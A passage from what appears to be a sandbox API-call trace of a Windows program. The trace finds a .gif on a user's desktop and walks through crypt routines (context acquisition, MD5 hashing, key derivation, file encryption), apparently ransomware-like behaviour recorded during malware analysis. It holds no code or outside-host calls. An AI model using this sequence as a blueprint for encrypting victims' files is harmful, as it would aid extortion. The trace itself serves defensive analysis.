hHeap=0x650000) returned 1 [0075.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.782] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0075.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.782] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0075.783] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0075.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0075.783] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0075.783] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0075.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0075.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.783] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0075.783] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0075.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0075.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0075.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0075.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.783] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0075.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.783] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.783] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.783] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.784] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22e93f80, ftCreationTime.dwHighDateTime=0x1d5e220, ftLastAccessTime.dwLowDateTime=0x28f76500, ftLastAccessTime.dwHighDateTime=0x1d5d8c0, ftLastWriteTime.dwLowDateTime=0x28f76500, ftLastWriteTime.dwHighDateTime=0x1d5d8c0, nFileSizeHigh=0x0, nFileSizeLow=0xdbe2, dwReserved0=0x0, dwReserved1=0x657690, cFileName="4N8tFmD4.gif", cAlternateFileName="")) returned 0x6b89b8 [0075.784] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.784] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.784] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22e93f80, ftCreationTime.dwHighDateTime=0x1d5e220, ftLastAccessTime.dwLowDateTime=0x28f76500, ftLastAccessTime.dwHighDateTime=0x1d5d8c0, ftLastWriteTime.dwLowDateTime=0x28f76500, ftLastWriteTime.dwHighDateTime=0x1d5d8c0, nFileSizeHigh=0x0, nFileSizeLow=0xdbe2, dwReserved0=0x0, dwReserved1=0x657690, cFileName="4N8tFmD4.gif", cAlternateFileName="")) returned 0x6b89b8 [0075.784] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.784] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tFmD4.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.786] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.786] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0075.786] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.786] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.786] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.786] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.786] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.786] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.786] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.786] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22e93f80, ftCreationTime.dwHighDateTime=0x1d5e220, ftLastAccessTime.dwLowDateTime=0x28f76500, ftLastAccessTime.dwHighDateTime=0x1d5d8c0, ftLastWriteTime.dwLowDateTime=0x28f76500, ftLastWriteTime.dwHighDateTime=0x1d5d8c0, nFileSizeHigh=0x0, nFileSizeLow=0xdbe2, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="4N8tFmD4.gif", cAlternateFileName="")) returned 0x6b89f8 [0075.786] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0075.787] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.787] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.787] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.787] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.787] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0075.787] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.787] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0075.787] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.787] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.787] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0075.787] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.787] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.787] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.787] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.787] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.787] PeekMessageW (in: lpMsg=0x61e57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e57c) returned 0 [0075.787] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.788] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x6969c0) returned 1 [0075.789] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.789] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.789] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0075.789] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.789] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.789] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.789] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.789] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.789] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.789] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.789] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.789] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.789] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.789] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.789] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.789] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0075.789] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.790] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.790] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.790] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.790] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.790] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.790] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.790] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.792] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.792] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.792] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.792] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.792] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.792] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.793] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.793] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.793] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.793] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.793] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.793] CryptCreateHash (in: hProv=0x6969c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0075.793] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.793] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.793] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.793] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.793] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0075.793] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.793] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.793] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.793] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 